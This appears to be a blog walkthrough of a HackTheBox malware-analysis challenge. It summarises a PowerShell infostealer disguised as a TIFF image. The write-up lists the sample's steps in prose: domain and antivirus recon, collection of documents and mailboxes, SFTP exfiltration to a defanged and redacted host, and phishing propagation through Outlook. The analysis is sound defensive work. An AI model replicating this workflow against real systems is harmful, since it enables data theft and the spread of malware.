Introduction

Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary’s capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.

This challenge is for an Easy rated Malware Analysis review. We have a HeartBreakerContinuum.zip that contains the binary.
Challenge Link: https://app.hackthebox.com/sherlocks/Heartbreaker-Continuum

Walkthrough

Extracting the ZIP provides a Superstar_MemberCard.tiff.exe file. Provided file extensions are hidden, this could potentially fool a user that this is an image. Some of the information in my analysis are answers to the tasks for the challenge, so they have been masked (hash, C2 servers, staging dir). If you complete the challenge yourself, the password to the C2 server for exfiltration will also unlock my step-by-step walkthrough of the tasks.

File Metadata Summary

Utilizing a combination of exiftool , detect-it-easy and file, we can acquire the following information

  • 41kb PE32 Win32 executable
  • File Creation Date/Time: 2024-03-13 10:38:06
  • File Modification Date/Time: 2024-05-13 17:02:36
  • SHA256:
    12daa34111bb54b3dcbad4230[…]c3842f015cccbbe6564d9dfd3ea3
  • Linker: Microsoft Linker (11.0)
  • Library: .NET Framework
  • Language: Powershell
  • Packer: PS2EXE

PowerShell Static Analysis

After de-obfuscating the script using CyberChef, the script is a recon and exfiltration script, with a nice phishing twist at the end to further propagate the virus to other users.

  1. The script sets variables for hostname, current user, stage 1 payload URL and and output destination
  2. File is retrieved from hxxp://44.206.187[.]xxx:9000/Superstar_MemberCard.tiff and downloaded to \Downloads\Superstar_MemberCard.tiff
  3. Script then scans C:\Users and outputs the names of users here to the <staging_dir>\username.txt
  4. nltest and Get-WmiObject Win32_userAccount and wmic are used to exfiltrate domain info, local users and AntiVirus info to DCInfo.txt, localusers.txt and AVinfo.txt, respectively, in the same above directory
  5. A listing of all current processes the user is running is saved to <staging_dir>\UserProcesses.txt
  6. If outlook is running, the process attempts to force kill it
  7. The script scans for all document files (.xlsx, .docx, .csv, .pptx …) and email files (.msg, .eml, .pst…) in C:\Users and dumps them into <staging_dir>
  8. Get-SmbShare and gpresult are ran and saved to Shareinfo.txt and Gpinfo.txt
  9. All files from steps 3-8 are zipped up to <staging_dir>\<hostname>.zip
  10. WinSCP Portable is downloaded from SoftRadar.com to C:\Users\Public\HelpDesk-Tools using Invoke-WebRequest and a spoofed wget user-agent.
  11. A maintenanceScript.txt file for WinSCP is modified to open a SFTP connection as [email protected][.]xxx and send the <hostname>.zip file
  12. Outlook is opened and a phishing email crafted. The message body contains a link to the executable used here and BCC’s to all contacts
  13. WinSCP and the <staging_dir> are removed

Task Breakdown

Restricted Content
This challenge is currently active on HackTheBox, thus is required to be password protected. You will need to wait until the challenge is retired for the full solution. In special circumstances, you may email me for the password.

Conclusion

I thoroughly enjoyed this task! This was my first take on the Sherlock challenges that have been introduced on HackTheBox. Malware Analysis and Reverse Engineering is the route I wish to advance my cyber career, and I felt this was a really great semi-guided search by looking over the code. The tasks do a great job of walking you through each part of what to look for. I have some experience with reversing already under my belt, so my straight analysis was done before I then went back and dove into the questions.

View my completion certificate here: https://labs.hackthebox.com/achievement/sherlock/677503/699